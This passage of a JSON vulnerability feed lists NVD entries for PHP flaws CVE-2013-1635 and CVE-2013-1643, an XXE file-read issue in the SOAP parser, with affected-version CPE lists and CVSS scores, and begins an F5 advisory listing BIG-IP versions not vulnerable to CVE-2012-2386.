"cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.4.5", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:5.3.19", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.3.20", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:5.3.17", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:5.4.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:5.4.7", "cpe:/a:php:php:5.4.9", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.3.15", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.12", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:5.4.10", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.4.2", "cpe:/a:php:php:5.3.14", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:5.3.18", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.4.6", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.16", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/a:php:php:5.4.3", "cpe:/a:php:php:5.2.16"], "id": "CVE-2013-1635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1635", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:39", "description": "The SOAP parser in PHP before 5.3.23 and 5.4.x before 5.4.13 allows remote attackers to read arbitrary files via a SOAP WSDL file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue in the soap_xmlParseFile and soap_xmlParseMemory functions. NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-1824.", "edition": 5, "cvss3": {}, "published": "2013-03-06T13:10:00", "title": "CVE-2013-1643", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1643"], "modified": "2014-01-28T04:51:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.12", "cpe:/a:php:php:5.3.13", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:5.4.8", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.4.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:5.3.21", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.4.5", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:5.3.19", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.3.20", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:5.3.17", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:5.4.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:5.4.7", "cpe:/a:php:php:5.4.9", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.3.15", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.12", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:5.4.10", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.4.2", "cpe:/a:php:php:5.3.14", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:5.3.18", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.4.6", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.16", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/a:php:php:5.4.3", "cpe:/a:php:php:5.2.16"], "id": "CVE-2013-1643", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:29", "bulletinFamily": "software", "cvelist": ["CVE-2012-2386"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability. \n\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None \n| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| None \nBIG-IP AAM| None| 11.4.0 - 11.5.1| None \nBIG-IP AFM| None| 11.3.0 - 11.5.1| None \nBIG-IP Analytics| None| 11.0.0 - 11.5.1| None \nBIG-IP APM| None| 11.0.0 - 11.5.1 \n10.1.0 - 10.2.4| None \nBIG-IP ASM| None| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4| None \nBIG-IP Edge Gateway \n| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None \nBIG-IP GTM| None| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4| None \nBIG-IP Link Controller| None \n| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| None \nBIG-IP PEM| None \n| 11.3.0 - 11.5.1 